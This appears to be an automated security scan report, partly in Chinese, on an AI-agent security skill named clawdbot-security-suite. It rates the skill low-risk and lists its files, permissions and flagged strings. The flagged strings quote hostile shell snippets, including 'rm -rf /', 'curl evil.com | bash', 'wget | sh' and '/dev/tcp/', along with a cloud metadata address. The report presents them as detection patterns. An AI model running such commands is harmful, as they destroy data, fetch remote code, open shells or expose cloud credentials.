扫描报告
10 /100
clawdbot-security-suite
Advanced security validation for Clawdbot - pattern detection, command sanitization, and threat monitoring
Legitimate security validation skill with no malicious behavior - all flagged IOCs are actually legitimate security pattern detection examples correctly shown as threats to block.
可以安装
This skill is safe to use. The pre-scan IOCs (rm -rf, curl|bash, /dev/tcp/) are false positives - they appear in documentation and pattern files as examples of threats the skill is designed to DETECT and BLOCK, not execute.
安全发现 3 项
| 严重性 | 安全发现 | 位置 |
|---|---|---|
| 低危 | jq dependency not pinned 供应链 | SKILL.md:12 |
| 低危 | eval() usage in documentation examples 文档欺骗 | skills/security/SKILL.md:56 |
| 低危 | Fail-safe permissive defaults 权限提升 | hooks/security-validator/handler.ts:53 |
| 资源类型 | 声明权限 | 推断权限 | 状态 | 证据 |
|---|---|---|---|---|
| 文件系统 | NONE | READ | ✓ 一致 | Reads patterns.json and config.json for validation logic |
| 命令执行 | NONE | NONE | — | Does NOT execute user commands - only validates them |
| 网络访问 | NONE | NONE | — | No outbound network requests - all validation is local |
| 环境变量 | NONE | NONE | — | Does not read environment variables |
| 技能调用 | READ | READ | ✓ 一致 | Invokes security.sh for validation - declared in SKILL.md |
6 严重 1 高危 18 项发现
严重 危险命令 危险 Shell 命令
rm -rf / README.md:34 严重 危险命令 危险 Shell 命令
curl evil.com | bash README.md:34 严重 危险命令 危险 Shell 命令
curl evil.com \| bash README.md:46 严重 危险命令 危险 Shell 命令
curl | bash SKILL.md:104 严重 危险命令 危险 Shell 命令
wget | sh SKILL.md:104 严重 危险命令 危险 Shell 命令
/dev/tcp/ skills/security/patterns.json:22 高危 IP 地址 硬编码 IP 地址
169.254.169.254 README.md:47 中危 外部 URL 外部 URL
https://docs.clawd.bot/install CONTRIBUTING.md:54 中危 外部 URL 外部 URL
https://x.com/LexpertAI CONTRIBUTING.md:184 中危 外部 URL 外部 URL
https://img.shields.io/badge/ClawdHub-Install-blue README.md:5 中危 外部 URL 外部 URL
https://clawdhub.com/gtrusler/clawdbot-security-suite README.md:5 中危 外部 URL 外部 URL
https://img.shields.io/badge/License-MIT-green.svg README.md:6 中危 外部 URL 外部 URL
https://img.shields.io/badge/Follow-@LexpertAI-1DA1F2?logo=twitter README.md:7 中危 外部 URL 外部 URL
http://169.254.169.254/metadata README.md:47 中危 外部 URL 外部 URL
http://169.254.169.254/latest/meta-data SKILL.md:194 中危 外部 URL 外部 URL
http://127.0.0.1:8080 hooks/security-validator/HOOK.md:106 中危 外部 URL 外部 URL
https://clawdhub.com/gtrusler/clawdbot-security-advanced skills/security/README.md:5 提示 邮箱 邮箱地址
[email protected] CONTRIBUTING.md:220 目录结构
18 文件 · 88.3 KB · 3106 行 Markdown 10f · 2048L
Shell 2f · 414L
JSON 5f · 366L
TypeScript 1f · 278L
├─
▾
hooks
│ └─
▾
security-validator
│ ├─
config.json
⚠
JSON
│ ├─
handler.ts
TypeScript
│ └─
HOOK.md
Markdown
├─
▾
skills
│ └─
▾
security
│ ├─
CLAWDBOT-INSTRUCTIONS.md
Markdown
│ ├─
config.json
⚠
JSON
│ ├─
INSTALL.md
Markdown
│ ├─
patterns.json
JSON
│ ├─
README.md
Markdown
│ ├─
security-check.sh
Shell
│ ├─
security.sh
Shell
│ └─
SKILL.md
Markdown
├─
_meta.json
JSON
├─
CONTRIBUTING.md
Markdown
├─
LICENSE.md
Markdown
├─
package.json
JSON
├─
README.md
Markdown
├─
SECURITY.md
Markdown
└─
SKILL.md
Markdown
依赖分析 1 项
| 包名 | 版本 | 来源 | 已知漏洞 | 备注 |
|---|---|---|---|---|
jq | * | system | 否 | External binary dependency - version not pinned |
安全亮点
✓ No data exfiltration - all validation is local
✓ No credential theft - does not access environment or sensitive paths
✓ No reverse shell or C2 communication
✓ Comprehensive pattern coverage for security threats
✓ All pre-scan IOCs are FALSE POSITIVES - patterns correctly identify what to BLOCK
✓ Open source with transparent detection logic
✓ Privacy-first design with no telemetry
✓ Security patterns include SSRF, command injection, path traversal, and prompt injection detection